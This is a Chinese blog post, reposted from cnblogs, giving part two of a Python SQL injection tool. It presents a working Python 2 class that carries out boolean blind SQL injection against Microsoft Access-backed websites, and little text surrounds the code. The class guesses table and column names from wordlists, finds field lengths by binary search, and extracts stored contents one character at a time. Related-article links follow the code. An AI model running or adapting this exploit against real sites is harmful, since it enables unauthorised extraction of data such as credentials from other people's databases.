Python编写SQL注入工具(2)

最新推荐文章于 2024-04-07 05:34:57 发布
最新推荐文章于 2024-04-07 05:34:57 发布
阅读量174 收藏
点赞数
文章标签: python ux 数据库
原文链接:http://www.cnblogs.com/Kerne0/p/4984257.html
版权

Access注入模块编写

#coding=gb2312
import urllib
import string

#定义Access注入函数
class AccessInject():
    def __init__(self,url):
        self.url=url
        self.tableNames=[]
        self.cloumnNames=[]
        self.length=0

    #定义获取表名的函数,使用文件猜解的方式
    #主要SQL语句:.and exists (select * from 数据库表名)
    def getTableName(self):
        n=0
        tablefile = open("table.txt")
        for line in tablefile.readlines():
            line = string.strip(line)
            sql = string.join(['%20and%20exists%20(select%20*%20from%20',line,')'],'')
            page=urllib.urlopen(self.url).read()
            pagex=urllib.urlopen(self.url+sql).read()
            if page==pagex:
                self.tableNames.append(line)
            else:
                continue
        if len(self.tableNames)==0:
            n=0
            print '未猜解到表名.'
            return n
        else:
            n=len(self.tableNames)
            print '存在表:'
            for t in self.tableNames:
                print t
            return n
        print ''

    #定义获取列名的函数
    #主要SQL语句:and exists (select 字段名 from 表名)
    def getColumnName(self,TN):
        column = open("columns.txt")
        for columnline in column.readlines():
            columnline = string.strip(columnline)
            sql = string.join(['%20and%20exists%20(select%20',columnline,'%20from%20',TN,')'],'')
            page=urllib.urlopen(self.url).read()
            pagex=urllib.urlopen(self.url+sql).read()
            if page==pagex:
                self.cloumnNames.append(columnline)
            else:
                continue
        if len(self.cloumnNames)==0:
            print '未猜解出列名.'
        else:
            print '存在列:'
            for c in self.cloumnNames:
                print c

    #定义获取字段长度的函数
    #主要使用二分法
    #主要SQL语句:and (select top 1 len(字段) from 表名)> n
    def getColumnLenth(self,TN,CN,f1=0,f2=36):
        page=urllib.urlopen(self.url).read()
        while f1<=f2:
            mid=(f1+f2)/2
            u=self.url+'%20and%20(select%20top%201%20len%20('
            u+=CN
            u+=')%20from%20'
            u+=TN
            u+=')>'
            ux=u+str(mid)
            pagex=urllib.urlopen(ux).read()
            if page==pagex:
                uy=u+str(mid+1)
                pagey=urllib.urlopen(uy).read()
                if page!=pagey:
                    self.length=mid+1
                    print CN,'内容长度:',self.length
                    return self.length
                    break
                else:
                    f1=mid+1
            else:
                f2=mid

     #定义获取字段内容的函数
     #主要使用二分法
     #主要SQL语句:and (select top 1 asc(mid(字段名,1,1)) from 表名)>0
    def getContent(self,TN,CN,lenth):
        content=''
        page=urllib.urlopen(self.url).read()
        for n in range(1,lenth+1):
            f1=32
            f2=128
            while f1<=f2:
                mid=(f1+f2)/2
                url=self.url+"%20and%20(select%20top%201%20asc%20(mid("
                url+=CN
                url+=','
                url+=str(n)
                url+=",1))%20from%20"
                url+=TN
                url+=")>"
                urlx=url+str(mid)
                pagex=urllib.urlopen(urlx).read()
                if page==pagex:
                    urly=url+str(mid+1)
                    pagey=urllib.urlopen(urly).read()
                    if page!=pagey:
                        content+=chr(mid+1)
                        break
                    else:
                        f1=mid
                else:
                    f2=mid
        print CN,'内容:',content

 

转载于:https://www.cnblogs.com/Kerne0/p/4984257.html

bangbanji0770
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python安全开发/高级渗透技术
04-15
课程内容包括python语言应用、介绍、开发实例、python gui编程、网络编程、数据库编程、爬虫编程、python开发扫描器、爆炸工具、漏洞利用等,通过本教材的学习,我们可以深入了解最先进的python语言。在语言开发、爬虫工具开发、黑客工具开发等方面。它正在学习python以及网络和信息。安全人员至关重要。
SQL注入
acepanhuan的博客
02-09 511
SQL注入原理
SQL盲注及python脚本编写
nobugnomoney的博客
05-18 3518
1、什么是盲注 盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从 background-1 中,我们可以知道盲注分为三类 基于布尔 SQL 盲注 基于时间的 SQL 盲注 基于报错的 SQL 盲注 0x01.基于布尔 SQL 盲注----------构造逻辑判断 left() :left(a,b)从左侧截取 a 的前 b 位 accii():Ascii()将某个字符转换 为 ascii
Python安全之编写SQL注入漏洞利用脚本(EXP)
gaojian5422的博客
02-28 1504
本例中以靶机DVWA中的盲注为例。
Python自动化sql注入:布尔盲注_布尔盲注脚本(1)
最新发布
2401_83739411的博客
04-07 858
这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。print(“数据库名长度为:”+str(l))print(“开始获取数据库名长度…
自己动手编写SQL注入漏洞扫描工具
12-31
标题中的“自己动手编写SQL注入漏洞扫描工具”指的是创建一个能够自动检测Web应用程序是否存在SQL注入漏洞的软件。SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意的SQL语句来操纵数据库,获取...
Python实现SQL注入检测插件实例代码
09-19
为了保护Web应用程序免受此类攻击,开发人员经常需要借助自动化工具来进行SQL注入漏洞的检测与防范。本文将详细介绍如何利用Python开发一个简单的SQL注入检测插件,并通过实际代码案例进行深入剖析。 #### 二、核心...
Python中防止sql注入的方法详解
09-21
除了使用Python自带的库外,还可以考虑引入第三方库,如`psycopg2`(适用于PostgreSQL)或`pymysql`(适用于MySQL),它们通常提供了更为强大的SQL注入防护功能。 **示例代码**: ```python import pymysql def ...
pythonsql注入步骤_python 打造一个sql注入脚本 (一)
weixin_39809168的博客
11-30 516
0x00前言:昨天刚刚看完小迪老师的sql注入篇的第一章所以有了新的笔记。0x01笔记:sql注入原理:网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作。sql注入对渗透的作用:获取数据sql注入特性:攻击方法由数据库类型决定攻击结果由数据库决定漏洞代码:sql.php当我们在网页执行访问了:http://127.0.0.1/sql.php?x=1在数据库其实是这样的$...
基于pythonsql注入脚本
03-04
适合刚学pythonsql注入的人 import urllib2 import re
使用python编写sql时间盲注的exp
CC210231的博客
04-05 1947
前言: 前面学习了布尔盲注的exp,原理是根据页面的两个返回状态来确定注入的语句是否正确执行,从而得到我们想要的数据,但有时候,页面只会返回一种状态,布尔盲注就无法实行了,此时,我们就要用到另一种盲注方式:时间盲注,也叫延时注入 延时注入原理: 延时注入是利用sql语句达到延时的目的,在mysql中用的sleep()函数, select sleep(3) 数据库延时3秒 返回信息。利用这个函数加上if函数进行判断,就可以达到延时注入,注入得出数据。 我们在exp中怎样利用呢? 我们可以获
pythonsql注入
love_parents的博客
09-10 3251
转载自: python SQL注入的解决办法 pythonsql注入 背景 APP爆出一个大Bug,只要在查询框内输入“%”,就会检索出所有的数据,最后有人给出了这样的解决方案,在前端进行验证,禁止用户输入“%”之类的特殊字符。 帅呆了!责任轻易地就甩给了前端! 我反问,如果百分号要进行禁止,那么“*&’“()”要不要进行禁止?“desc、select、from”等关键字要不要禁止?还有“+-”,正则表达式相关的符号要不要禁止?就算输入框禁止了,直接发送http请求又如何禁止?
Python编写SQL注入工具(3)
diaotuanao1650的博客
11-21 367
Mysql注入模块 #coding:gb2312 import urllib import string import binascii import re class mysqlInject(): def __init__(self,url): self.db='database()' self.url=url #待检...
Python】实现URL-sql注入检测+源码分析
浪子燕青的博客
01-25 9062
上篇博客到了对原始URL爬行页面提取有效URL这篇继续深入,当提取到URL后开始检测是否存在注入漏洞  SQL注入检测思路:                 爬行网址,提取带有参数的url  如 http://www.target.com/show.asp?id=666 这样的url地址                 然后通过5重验证 :
使用Python打造基本WEB漏洞扫描器(一) 网站爬虫+SQL注入检测
热门推荐
Wang Gangdan的博客
03-07 1万+
一、实验介绍 扫描器需要实现功能的思维导图: 1.1 实验内容 编写一个简单的多线程爬虫,用于对网站地址进行爬取,编写一个简单的sql注入工具,用于对网站地址进行sql注入的检测。 1.2 实验知识点 多线程的使用 网站爬虫的基本知识 SQL注入的基本原理 SQL检测工具编写,多参数URL的sql注入检测 正则表达式的基本知识 1.3 实验环境 Python 2.7 Win10 PyCha...
python预防sql注入
06-01
SQL注入是一种常见的Web安全漏洞,攻击者可以利用这种漏洞来获取、修改或者删除数据库...总之,预防SQL注入攻击是Web开发中非常重要的一项工作,开发者应该注意编写安全的代码,避免恶意用户利用SQL注入漏洞攻击网站。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值